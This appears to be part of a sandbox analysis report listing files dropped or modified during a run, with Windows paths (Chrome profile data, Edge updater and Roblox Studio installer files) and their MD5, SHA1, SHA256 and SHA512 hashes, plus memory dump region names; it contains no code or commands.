SHA512 2111e3c7e82ba710d5a2671d0d34c52faf004b5546db82e4caa93ac1ee8d87ee304c5357022ac82cf32e78d821f8a883c519ff255553cd3fa56a489b27680cb9

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb\LOG

MD5 96b5208ac5d9e573b5d7b3a9b0d975a6
SHA1 f994b21303735a6d4a2d5d99c8112fea945f0c64
SHA256 be165b3cfc62bc8f313aa5f5824d34e2c577b093e48c43e25ebbf72ec8ae56c6
SHA512 20d81a8df35d24c36f691b38f00d6768bc81cc19510b9bb395abf216f7a79ec855847e8aeaddddaa6e11ee5e3334c42ce7d7dbba4dc6a9144ff58218a222bec3

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\GrShaderCache\data_0

MD5 4f18a35997d6e3d5d73e18e5c4da57e8
SHA1 ea6d9ece4bd2db4607c35ccb33e057058cb6a5d4
SHA256 bfa44b89769b078fb683edfc5144c65c8085c4f455bd49833eceaff5c1335e4c
SHA512 b4eb5089ca95a25a33e58e07bed3361720391bd9dbd969ebfd19a26bea3e59418b889b2cef82f3d44dd2665f83379970c5b21e9433e2967a49f2c9b893eaf6ae

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Session Storage\000003.log

MD5 046cc08d163fc4578cd1b77a5d0965ac
SHA1 92f503e605c30974baf385f1619f1269b81dec57
SHA256 693a60684aa9ff4f01cb6027e9c938f4701c0c898afc224a0776cb1e18e87166
SHA512 e8b1df36a237bcbbad897146ca247edf75466b2a4030fec620c46932b5c31137f2931cd2758534e4308aed3fb9cc40edf2d7646a38530bcc5e6d7069c19a3b1f

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\GrShaderCache\data_3

MD5 eec409b424b189351952ec8bf6c16840
SHA1 27828066c50f7e09f0dd78de67c5b416030ce31a
SHA256 74845de0a667293c77cd53dabbc2c8f378e91618761b1be665e00e0153d0cba2
SHA512 c70d04316c69b62ed5b523cf997f8079c2166b9795e4956c70b8cc0ab1af51412f0a52a144cb5fd82e240d17b993a5b783d4130c2bcedcd83cd94e66a9d7c69f

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies

MD5 832bde6e94c79e219fb899046d2866d4
SHA1 d2874d6c58b8e86aaaa2229602ef5e201fff7a66
SHA256 7f945b2fa099258f013e8000e4b5d9c8db094e8cf814b75251f4d354643a44b2
SHA512 00e44797395c562cc5141c07fcbecfc845e67529abf73bcb8e73e676f31e89157553dd10e7258d80563ea01a66749350bf04c7b0e6ca6c9324ea9f3e3a1372ca

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Cache\Cache_Data\data_3

MD5 4d6525545692428bbcb36c2f314fa7ee
SHA1 2d45dde3a11f77bbeea0aefd263554c0f1aa57ed
SHA256 4544868e1833deab1d819c3f9cbe97f61f5dcd6cf4bea38a18f375e888e82579
SHA512 a18480612d952dbb84175eada163ae14400573091655740d64938eb6deb3164cdde1856f45d9aae5949e6a0b487fd512686591db2df4d723abbfa4b74d35095d

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Cache\Cache_Data\data_2

MD5 011e4aca502eff80e9b69ba422e1dc72
SHA1 be09cade14d8ebb3a8f5e7f0bace2efac4c75dba
SHA256 da52c160a1e6e0d2a6a3be6c40de0359229d3ff38cddf01723c635c38874ed95
SHA512 9ace6cc51c9eade6f8dc516043ab0a20c05c80e7f2166dec86d07b1a341ec011a966ed8613890d33e807d3955f6b21fa4b139f287e9016e199ed6377e533c554

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Cache\Cache_Data\data_1

MD5 41af98de92f28096b5452387cd83b5fe
SHA1 dad411f607df5d5814d90c789a7f4f97bb084544
SHA256 a62c3962bdb2d56e2f6e89c15e5d0f4949755fae781e1b28ec7883ec8b1f93f6
SHA512 d7bd65eede528789193ea5e8134923d775f0bbed533f6e0a85df430e74f7a453c8d08256da004937045ee49c6124b9bf8e976b454d1ad67bf80551c754610a7f

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Cache\Cache_Data\data_0

MD5 6228a59044c355fa115198958a84787e
SHA1 b058ee1ca9599ecc7ae18af6044885704d16585d
SHA256 cc82acce886afea962270eb9f78f236c8f33ba5794f12fca4d184be549f363a8
SHA512 524fd3a53b352477248fa765648c67f8f707fad055a5b2d77a213d4e5067661e2d2136d02188dd38838163771c8cb638f7438d099c036b27f3b81a436b9b14e4

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extension State\LOG

MD5 104ce3972947cbdcf89c989eaf44e81f
SHA1 ed71c24a9537f3559f25886571d6c3385a16fd84
SHA256 6e0d3b43192f02290f34548ab401a947fe0ad1ba65f5ebc2246f27d57fbd199a
SHA512 5e385cdb46cfd0094dc29e1da7516386bb40f9e894d5a43fc5491e17d5f7dc32698c0b77f7501a77d04c809951a0af9fd0905696060a21420581b0a5d6e1b515

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\GrShaderCache\data_1

MD5 c5f4956e78109ac31f2d3f4090850047
SHA1 b532f6f25e9d18e1ab8b9dd6b3b3926f64f5f757
SHA256 9dbfb862c0a083661e49f8b1e8985dbc4f9d8833550b6583623c56a4bab78d09
SHA512 40a03b9b36ed2833a0024d4040527ac40f459a57f6b5ae49fa15d32552cba76df7a2f0fcf8b6e1dbfbad5ae9d43ef60d6c89f1a9aef2a2fd9055fcfa4ff1758c

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Session Storage\LOG

MD5 21bd794d9db4e9d2aa9c3d84537b7ec3
SHA1 4fb18e37bcf0ec728dbf7c8d61a8332447581e16
SHA256 cf920ab30b8e79358fd32cd24696f66241e5531cc90e1f4bdd29ecd2fb61aaf3
SHA512 f402b66db84998faa7247de7b25cfeba85038199dd02f769ff309f893327f1fd7602d0cf18831047c3ed2fab45733a6ea813a9cec9d19a7228cbc64604dfcf8f

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\shared_proto_db\000003.log

MD5 3dc376b4c2b65327476baf14817329ff
SHA1 9cc434cbe7d12ea08ab27e7aba90a13fa15950ef
SHA256 5a116377f7b3d30bc585f0aca7660d1f2bc48d9e0c7d56210794c13dcb30058c
SHA512 f07c093522363fef029bd305efbcaaac30a5cdcf6464345be730cd05e4ae6def23d78d97f1d59428154d3d46384a1af6b719eeab194ef80b66ed3580053b2bc3

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\shared_proto_db\LOG

MD5 d91dba7854470d84361eba7a05f37233
SHA1 abf214cdaca3f889296ad5fd3a7f49da49573c8a
SHA256 456391bf1dbf269cd084c8e0b37bbc5eb619b70de94bb21070a737a8eb7268df
SHA512 d41f032be88003da2a1bb42d3167aacad49d58c62fbddd2cfcf3766b65b08e5669a9fc05754ba910febcd13a27eeac37f399d9d64a9ea6268b3262186cd35691

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\shared_proto_db\metadata\000003.log

MD5 c4b9480e91644337546c467d8cbc3d3e
SHA1 f61c6648e346e3061daf131f6410631f65b2f6a9
SHA256 1ddd001fbc6c23f354f0dd92a6b3bc7a99444b7d3a8930f18130ffea2b94df76
SHA512 000a88118ab3de60599e044b5b410f1ef3cbfc51ce7e1d49d87d9c9e5a904adfceb0776dac5f90f9f8618530877f9d058d04438a113e0f257c50ff6e775efa6f

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\shared_proto_db\metadata\LOG

MD5 52d92c2943cc6db3fd76c98040193c8a
SHA1 9a520a9ce3e2ca0e1933c1bfb9d99756f9e3df8a
SHA256 c0d089909001cad6dd284f036290740f4042715d14bcb5bfd48aca0726c835c7
SHA512 6cc5c6572acc3e413a1109d61533be096bd3f61f435358d232264f6a5471c95d8f393ea557c1216821057921b368a0a3704945d984fdb96b1df392d246aea3c0

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\Reporting and NEL

MD5 2629dad2403bf9edb09c6f0d95b5d49e
SHA1 f75b0d81cf5a0fbf967a7c40a41938f8a041d3e5
SHA256 84eb473e3038816604cf84bc70c2d9b958a9a3f3d296fb1661990465b9a07618
SHA512 50d52e7bb436addb4b212bc4d99a56f7adb6d27fd4e133cdd58836a19217886f046a7f4954b05f8166cb993102a93da59b0ffe44a5178ec170b9eab4c6b0fa44

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Cache\Cache_Data\f_000001

MD5 0baff63ef69dc64878cac097de7055d6
SHA1 dea3cba3c8d48c12e0596c91ef2f5d5d59ebc8fa
SHA256 86b545062ea8a5118858ff84db189f3abf604334841bd92ad29764888744d529
SHA512 0f0423256bb8e2bb9c8900d09cd51b0d80d0a45f3f8fa9be29744661624a879b71e21d550facff592ec8ba53c0cd585f83d294e8ab45dec35c2091700f309971

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

MD5 ab321f3b579d39a7f3a593c89ed4d347
SHA1 d57b807f4a21eed5417cbe74a553f8024477116c
SHA256 458f60e4acd54526c74988297059df8c4bc0267c89bd990024431cc0133cebe8
SHA512 126c603c71139f2c0df8c06629287674b879b2a1fe0a60bbd4232aaddcc2663dd3a03ea021b8e27f0b0ed4e61ba40900d53d9518a18a09b0becf40464af9ec8c

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\e808d71e-1f2c-4440-b01f-e8c4465f5b0d.tmp

MD5 f833008e5731462860c015c995973009
SHA1 d8f5382200c7cbbe1b4d29190ef57ad55292b2e6
SHA256 8fb8196d0fac9270c07bc3dd5b434660e674276ebe7b402071f88d95ce42ab29
SHA512 b14a03667943261ce0681d23abe26bf326927d385351ff51592cd62fd74f7c1fd1715ee0848bbe26d318e64cfdaad173e158a9de56d1c49fc39615407bc4147b

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity

MD5 173252897a5d9d02a02cc3faa123a33f
SHA1 d5b53678fc264f8e200cbadd83c322774a31dfe2
SHA256 b7baeb71d5cd24d5228695f5a6c8b4e852a3de438a15e1b518808d1c4d8c3ecc
SHA512 557ef62fdaee40236521f57e535dfb997a57c7ea1592461f7d929fd59c64d35023e076dd9379026e1eb3fc7a5f6611ef2aad467544138810a7d8745deffc7085

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity

MD5 9e0c5a4f9de3a9ba3e90d6d68ad4a277
SHA1 3ee11b6d5aac56269964b334cfdc9e2dbfe6485e
SHA256 c796600806e6fec8bfc4084279b3f14fcf68a03b51fcd45735b51e2416babe20
SHA512 30c8806734d6effc658e90fd1845bda71f678c154e889454e91abd758ed197397c193f6e53eaf97675d6e397ef8d515af0c9951797dfeb2981b7ed2a3b598acf

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

MD5 d0002ac6ba5385a4e392bcc26e55085a
SHA1 80c0833837ac90ec7c71b46b713e2ccc7da6e1fc
SHA256 1a8718ce3194bd63f045faef64c092332af515837341f18151636b3922e7a11b
SHA512 e52009b183a42d9de85d7592cf91ddc01265bd1928954873ded5230b70253a01463a608c032bcdf7a6a6fcddcc35fc610c6095c6c1b661883824e4a99b888c58

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity

MD5 9a8afc094f7947eaea65d3e3f5edd740
SHA1 5c8a4c687120c9ed34b578e7fdabd6d4bf3dfa16
SHA256 d3a71c1c5d613cd6407784e1c0354583f5e33e81ff6506ee77648ffd025ac841
SHA512 6628b81820747c7500e676f252f3d3f1128b5bd5cdaa0e515689a38121e7cffcf17e5d826c08857b7ce6dcc959045cd89fe8a5360c5b9b87942f61fb6d99c3d3

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

MD5 640fa74e08d647bdac8d48e0c3bf4032
SHA1 cb1cd1ad50853e6dd3c8bb4ecd33eb0a19f8f8de
SHA256 c7a032a7b321f7e7fe014a68522ca0263db286df7b1ed7fbed651f3d6ae5a341
SHA512 39454330aeddbd117d5e90c858abceab01d247831f79950d6e59bdecb034255225d38c04690feaedcf042c3aa9bbf11c28aa0260e2fafd376c6f56c2fc5ecb20

C:\Users\Admin\Downloads\Unconfirmed 284260.crdownload

MD5 27469372591b14ff1c57654facb5e020
SHA1 492c166cd0e6c8d122ca4687659bf047cd48afd7
SHA256 3b8fcd52686095049b1563fbb6ba0bf73113a01b13c303bebcb36d8339a1519f
SHA512 0cfa845de57acf6f17f295f0771c2a61cd846efdee79da012def474bcaa91d9e99d3d528cf5698e6112a310c4f97e98ae74b6cfc601b2988c51e92270ebf92a2

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity

MD5 c536da5241b3e093391ff8917adb4f3a
SHA1 9b8a750a72e7a9a90e2b88fdf9642be57b422b47
SHA256 fe81309b93f7c2732ce53818eea6a0f4825626733ba28b36723a17d626ff8e71
SHA512 42f8337cd4ef7be6282141b2eac34d152067d718a8644679b4bb93dcf2aa1c2cdaac25686cf7cf5466bdeb61ad3244bbf9577e01d0d593716b361129426d09b6

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Module Info Cache

MD5 aedf06ecb50fa71102e5498d624a7565
SHA1 7a796f6382e99449b50610d67393fe5f8d4aff52
SHA256 362cbaa627a6a073d517d0f76ae7f1109efc25f601b764e47f0735daac6aaf6f
SHA512 023bf48dc2151383c5c510f7decddfc4de12785c8faa27272a928823e991f774866c993ab3beaebbee8bc28c76f501753d5a1889d4349c64f0f087d47db8a2ac

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Module Info Cache~RFe59cb55.TMP

MD5 69731a4a1dbb74437bc28af549a9eaa5
SHA1 c024ea7bb3372f45cc64123c8956651ac90ebedc
SHA256 13b60ca4336678c504f0bff76a32801b73321de88ebfe41c28679ebb0009063d
SHA512 5a8d6937a89c34bdd8504c29b680546f5dc0086f297bb2b535e9cf5771181fb412444f4059f1dbf8974c7622187daaa0cf4a9a34553c1dd0f24aca139377c097

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dir\the-real-index

MD5 9c0e690ada6096d511e7ef809b7fba6f
SHA1 cf981651f71498b549ad0b58d27a25a9e3ac7505
SHA256 0acee6ce59549beae998999fb907eb6cb92aadf6a6d9917a66013b94ccc7c950
SHA512 d525bea99fdc9b24ae3ea427f8066e3ecabd2e5f6810a2da873faea15b64ce4146fc8aab3d0617580ab7875d1e5db794d9c5066a14bab41bd48ba703264eeed9

C:\Program Files (x86)\Roblox\Versions\RobloxStudioInstaller.exe

MD5 087672ef1f8a03c6fcea3dc8ffdd2a24
SHA1 2b01ce0e333d858c24b785584d52ade38cf679a3
SHA256 595b1052c954a7e68abcfc53df39db3ec77ac8ec66d187cb39150cd70e3cf601
SHA512 54ec51d1e50b0e39a14099da13f1adda591719b58bc6f17a727c6a47461505c4d122fa2100b59029b17a755362f9c435966ad75f5a1df62c6703ab8dd5a2de90

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

MD5 1a17020609c578340c4d8524c2089c09
SHA1 b3c6f373f8b6115f4d6aebcbe647c8cc4e9dd44c
SHA256 cb59e457c3ca6e49f485cae71cc91d00e7ffde3c382dd26f02969e6077b62d86
SHA512 9acb9ea6aad21ffcbf5d3627e50453221bbcd47042128f5d40546086a4709cca92c231a1cb8ea500b611660655046e2e791bc390ffedc78722521f754d2e50ab

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\Network Persistent State

MD5 5bd47ffbef417c556977b5f4b70b866c
SHA1 44e67ba13e6688062597ba11c4520d9c069c87bf
SHA256 9efa150096ed1f0e56598b73a396f54b201fc40209e1d9ba5608419c7569aff6
SHA512 d781bd2265754780849e433e936e78de8d911e2390fc3ab5028ff82df71feb18807593d119ce2a42c7eeb3482619744315bacde3718815d225e2ece8abe54810

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Module Info Cache

MD5 406ac467f0149f72e8c1f05c09fa402e
SHA1 2286efa38ee76150ee148f65621e67b786d387ad
SHA256 65dfc8831474e12e1a8db5ca5a26fff0f3d52916d557f59b743957f67e14954e
SHA512 71971c0978d306ca1b5b306afb7984ed6334699c0cbe81cf85a95e64db733b309e04e67c68ac735d26b16202ae37ad3ddd741d5733fc8f5ec56c42ef58597727

C:\Users\Admin\AppData\Local\Roblox\Downloads\roblox-player\071a86a82f51e91c9a47bb2db7499e0c

MD5 071a86a82f51e91c9a47bb2db7499e0c
SHA1 d583e6fc19ddf59a70b7f3898fb1b1933504cfeb
SHA256 15ce1bdd1a117d0a755f8f77e5a789ccf171cfd0c56bb7532ac8cad8c35de692
SHA512 1345b189bfc4c5a7eb9c6397efb2d9d19a6498b6e4da03e5b2fee3904c2ce914b3d4ea7f80958dfd5946fb92ab1c45b262f81a029a7302237b96575c94160dbe

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity

MD5 37ad674d330c26b91d60be343081f6c2
SHA1 d0fdd3963764cf44de2a5be18d5ae51730ddbb12
SHA256 c06a7fe4d74dc0501b939e5ce140077715949d03ff848a0711b68a3720e2731c
SHA512 28a868919f73e8ee1afe8ec899a474877d8f25c7fcdd8b04e2c0f21181cb468db810a66519fb82510f4429ec9413bf80bbf3c72bf6aa82c6eeaafa996ddd66ac

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

MD5 1ff30687ce59523fd3c04a18fcca29f4
SHA1 d99c08ce20f10eca5749ae71530c92494980244a
SHA256 be085fdc44f1c5eab4ba02e6253cc05494670a001327a25156b11e164949a8e2
SHA512 afc74998a2145f482a21fd9d1a38f3bfd91f7b06bd596614170c25c5658ff4cc4c978cc128343c59e86180e9ab053b9202443ed999c0025c06f72f4e0b26b7ce

C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe

MD5 4dc57ab56e37cd05e81f0d8aaafc5179
SHA1 494a90728d7680f979b0ad87f09b5b58f16d1cd5
SHA256 87c6f7d9b58f136aeb33c96dbfe3702083ec519aafca39be66778a9c27a68718
SHA512 320eeed88d7facf8c1f45786951ef81708c82cb89c63a3c820ee631c52ea913e64c4e21f0039c1b277cfb710c4d81cd2191878320d00fd006dd777c727d9dc2b

C:\ProgramData\Microsoft\EdgeUpdate\Log\MicrosoftEdgeUpdate.log

MD5 5f8ecabe45f1a8d575162338298705c6
SHA1 beb96b8360753ed659ddb30a0cd214c9bb97d938
SHA256 2adce2dc286f1d82f722bd9e81c75b8a06fe53d84b1c9c15c6461fb95d8f4434
SHA512 3c07cbb924cba92f2ca752f9b9fcb692e9c50e501008d2e165b2e1a9b5e9011764ea99f45f0f845b09d6c75de186ca3fa46090e30ca2e29cfa832bf9f196c6c0

memory/4872-1096-0x0000000001140000-0x0000000001175000-memory.dmp

memory/4872-1097-0x0000000072B70000-0x0000000072D80000-memory.dmp

memory/2832-1098-0x0000000072B70000-0x0000000072D80000-memory.dmp

memory/2780-1099-0x0000000072B70000-0x0000000072D80000-memory.dmp

memory/2780-1103-0x0000000072B70000-0x0000000072D80000-memory.dmp

memory/2780-1107-0x0000000072B70000-0x0000000072D80000-memory.dmp

memory/4872-1111-0x0000000072B70000-0x0000000072D80000-memory.dmp

memory/2780-1113-0x0000000072B70000-0x0000000072D80000-memory.dmp

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\Network Persistent State

MD5 afac87b14b40d374fd0efd1b609d2ee4
SHA1 16a9ae4024cf822988c2853bbe0c5269f2bb91ff
SHA256 856b854bb7693c605f441f5f928b8c966817cda477e6fdab8df7eaca2dbe7421
SHA512 f9d589f660f81ac98735862f46c09bc63095025ab7de7af624442e297be2b2c34bd5357eac92a63c7add2509a1be45802be02f1209aab4d009e709b4ac84613a

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity

MD5 8f97cc146eb8551c353c114ecd0e2245
SHA1 ce9af6085d65856f60b8a7bb533ec07adfa12007
SHA256 12b50f3167a3397a503a69beb4324c70637ea62c48c741b689efccf35f6a3557
SHA512 f9392892d34fb69efb287d746b2242cdf4be0a7fb206245df9349499c5e17e62ff5cd5b4b73760aedfa7f65a247aab1891af4eb24a4ccfbe41b66b9988600940

C:\Program Files\MsEdgeCrashpad\settings.dat

MD5 30e9af8c7d1add34fde174011f4a8b13
SHA1 d467af2283afdd96a76bc38b7dcd188131d9b4a9
SHA256 f9a84044ba798b626249b841314fd30986bc977df493c546274856e738cfc882
SHA512 312c14e8cdafcb70fce40339b4cfe1bf1b567a22c80664bc4f61d4ed96261d6edab7fabf54e14c05dc94f93cc320867d4ade3890dc7fd5ebd721a2fc6596bd8a

C:\Program Files (x86)\Microsoft\EdgeCore\126.0.2592.68\Installer\setup.exe

MD5 05e320ae544022adea3f8c441646765d
SHA1 3c6266b8a8c0132a97b2785bcb9ae7546ac02cc9
SHA256 e1618f31f476932871871ebc6e63d57aad643b74ea892d3d305e4125df1e6f10
SHA512 c1cf5c001ddd6b3b3c68b697f8ec9f1cbd48b5881f9fc805d74eb14a13eedcdf71e958ca1b790353a4edc64008558295741cfb785e0a3824a8f3a62bc985d387

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\Network Persistent State

MD5 4f99afa3819597289aa922c0f5dc39de
SHA1 98638a9110b95647f985cb5a0a29f2cead5d3938
SHA256 edefd6e18bc495e1d9ce613d368baede1e1f9bda26d1a340a43ad0bd9845a6cc
SHA512 2cd6cbbd44d1673c5959f47bae4f30144bd48ceb11374c11d477e7d250fa5e67747fa929194423d3da6fd73a9fd13b2fe103cf9357b0d96d341b64ea0faf1923

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Cache\Cache_Data\f_000007

MD5 2280e0e4c8efa0f5fc1c10980425f5cf
SHA1 1d78ccb26fef7f1bf5bf29de100811e1ac8bda23
SHA256 b9225cb1f0df94ebe87b9eb2ad8c63cf664d2dfdb47aeaff785de6c7ce01aa74
SHA512 b759fcbf578947c0290ab703652df9f37abb1f9f5cf6140acaa8c4d4ee655ee0ee1f9bee9d4fd210d9e12585a51358b52e0e9c0878abf2713e6fd69a496ac624

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Cache\Cache_Data\f_00000e

MD5 83df136302754e5c9b6d3a19ccb8c266
SHA1 19ec62c24c1a86426ea1740bba082929f5b3b017
SHA256 b03c18803f987261e0bbd0a1709b1772142e7d3f9a22c741a9d88ab95eb53cbb
SHA512 4ce9d696e47aa8492996fc7c53f222bce7adc64e669a3487789b850c73132bf1cfa8e67cb1531f26c04c8775a391e9fa92d2ff52f27821ab70949965ec306340

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Cache\Cache_Data\f_00000f

MD5 2e33defc64c23c056ec993d434f86f27
SHA1 bfd974be3c3467ad1b4ab46fd4049779c001490e
SHA256 91a0d8b56e64e289154e16b4ab305bdcda13ff6632cbb81eb8676632325fa328
SHA512 148eef503a7929e3ddf10b4995d82f162dbd7ab0b39759582a4294a28c4376de21c627fa831e6a082701bb87c947f1d47c53265198a0779babe8d99e6b84a249

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Cache\Cache_Data\f_00001d

MD5 b6692ef1b1b1ca24ca6071b50da45ab6
SHA1 14376245a66157fa78c1c30a4a057eb12836e915
SHA256 1ecc2aa37ddca596599924b5dc4b7d53acac7857c106ed825d72c71ce1fe57b5
SHA512 234d1b1e56632015c0a0b5e92f8ea88f06407cfcb353a6b138222013a1c082b0817075717f1d0bd8a31dac44e69dfd8e842f472cc6438f985cbe24661ca49c60

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

MD5 a178bbeda3282556b500fdc6b3e76e7a
SHA1 0f15e47181e45aab6c1e21f4b9b69c53f470b341
SHA256 334e831198cac64b3e03c1cd5caec6691d4cb2420395d6da38b72c6db5536626
SHA512 5b59f7ba8be4ade4d55dff7536a66844b9e41ab4ff4c19af4721c3eba2932749f02ad3e5f0c40c739fb28e5b59eb1822b199b40a9ded9088a6b0fbc79107bd4e

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity

MD5 7a03b76c92d38ad3e4f8be1625f4254c
SHA1 fd2d5d2a80f0d3e68a6990ef1096c297c0631684
SHA256 48d87a640dcb20d7517a7d8fa8f5cb4a43c0c663e60c27df8cfd53b587fd2a08
SHA512 7da7db7e510373ce02f062bc5f2e6a37d077c3b98db0c2e7f5b7f5550e9c8a3d342a9e2eb24ffd7d4e3da31e79091f94231abdb639d5b6c012e539861469b4f9

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity

MD5 76e5e7d5b5f068bafc6f14345b3c04ba
SHA1 c761c19738faa2118dfbefa28bf5237449fcdd8a
SHA256 36b3411e90f739b99b3be4c8a8af96c8569ccbd30ae39f33cb386b3d4644659d
SHA512 91e78746352a2a258ec45969421188e98e745614bc8f68216965ff1dcc60505c0765cfe2528de073f7a15e98978e3c5976eef2034f38ae36f83914420f454adf

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dir\the-real-index

MD5 40fee15aa5ffa524aa264280280809dc
SHA1 724f866410531622be69eaed6cca5f806ab3fd2d
SHA256 f47d7ce65c7dcd62bf63eb2877c4743b682c899a0065d83b28cac74ec693528c
SHA512 f2877f9b1610ce02d204a58b4ed134957c42dc04ca23cc28cbfdeefe5e330fe83c260980df90c58d0e0ad254a11156548b29bbcb95798115ebcb2659adc5a16d

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity

MD5 b91fc70ca155ee2b181dcaf94764a55f
SHA1 b8cd8799a470ea10fb7ba934770a97cd3dd21352
SHA256 bc1ac9161722a4490ce574072840f161ad9825cb3a9388237cfd442847772c0d
SHA512 cdff7d47db3bcf9d5a6aedaf08dc7ff6f66daea38d12554fd510bfb5e589fe19e067c232b8743e572d8c1db8c35cfa0ad378e4bb4ca35b81beedb37e11df75bc

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity

MD5 fa4cf96bf30c1fa3ecb01dce1ef65bbd
SHA1 6681bd8d85bc3b8525581f8092fb5006048858c1
SHA256 ba58d04d6995f837e07ad713d1b56507942ee5a0d0f5ea1ec2e5bf86c57fe12d
SHA512 863989202a0373fba4d1d0f5ae41ee698d2cb12c4c0e455be50237590a8b60a44ce4ce1492f8327685ea077733ae48d272d23052f31e57c972195080411c5311

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\Network Persistent State

MD5 ee0b397fb19a55772b9fc287217255c7
SHA1 a308a99f45f9f57edf3e58d701142b289ee2fc63
SHA256 6dd54efb791bd6d47a1be46dc77fc40437c9fcd00edbc94445be3f53ce655205
SHA512 a413f8e32c519d526607217d2210cbb27f9a0b9899e5c2d10b8fca05fc63c2df76335b9706d0afedd1b7f4a7fee2a92cb8f48fed0b5cba88fd5ef6c496de2d53

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity

MD5 66d91b7e8c759fa68affb9d5270f0b54
SHA1 2bc97384923d5f8397cb91583ca9de54c1795cb4
SHA256 60e4807e5cdfc19e4a283b57712eb0bb1adc2250d87be9fca7df4fbebf2d7fe0
SHA512 6443687ac040d713a4402a43fa151f502eb3e03dbff1ef724827e3e0ab2740d115a1da3db2dfba96c6c84c60349fb0f8d081c25f9543688a87f39b937c096d45

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\Network Persistent State

MD5 338dd016518bddd70d809b41b103cf42
SHA1 cfcd908111e210f3962c0a6e7e5395586baa9954
SHA256 7d61dcf2bdeaa1f9c5f47cc9f41934d8c5b75f5cbefd51e714e81ee321ae00fb
SHA512 6b6953ebf2d7e66f0a4cfa1498c766c9d827f7a06ddb685a90b0989dc137ee9f84b79a68c72db896647139b7118ebfb30f9658213d80463fa0cd8071fe4f5729

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

MD5 043fa513559e82b66956f37d8bc81007
SHA1 5acb02fb1ba53740b6a5d33ac353766720d9e62b
SHA256 80253123922423adba0fcd233ca2ddfc2aa57ab4ef18190e1cd97b20295bee0e
SHA512 95f3ccfe2e753d1892b726f9ede50ac5f339e1b66fd409677029170ce0db262f0c8f10b3f9336472c743ebb19ad86f5dcc718a990bc7a132a812d02f7087e405

C:\Program Files (x86)\Microsoft\EdgeUpdate\Download\{F3C4FE00-EFD5-403B-9569-398A20F1BA4A}\1.3.187.41\MicrosoftEdgeUpdateSetup_X86_1.3.187.41.exe

MD5 a9ad77a4111f44c157a1a37bb29fd2b9
SHA1 f1348bcbc950532ac2b48b18acd91533f3ac0be2
SHA256 200a59abdeb32cc4d2cec4079be205f18b5f45bae42acb7940151f9780569889
SHA512 68f58a15ef5ba5d49d8476bee4a488e9a721f703a645ddd29148915d555ca2eb451635c3b762e5a0f786d69bb5cba9bffac3eeee196f1ec7ad669e2d729fe898

C:\Users\Admin\Videos\Captures\desktop.ini

MD5 b0d27eaec71f1cd73b015f5ceeb15f9d
SHA1 62264f8b5c2f5034a1e4143df6e8c787165fbc2f
SHA256 86d9f822aeb989755fac82929e8db369b3f5f04117ef96fd76e3d5f920a501d2
SHA512 7b5c9783a0a14b600b156825639d24cbbc000f5066c48ce9fecc195255603fc55129aaaca336d7ce6ad4e941d5492b756562f2c7a1d151fcfc2dabac76f3946c

C:\Users\Admin\AppData\Local\Roblox\RobloxStudio\WebView2\EBWebView\Local State

MD5 c8fe0dee9ad0e3447b065a9a7aa18ea2
SHA1 7d89a85aa89e8b6f89321b16f39f6e4e3bb071d1
SHA256 cec214c0d6e065268e2ad979110de292a98c85329c661d004f21cf39ab8e777b
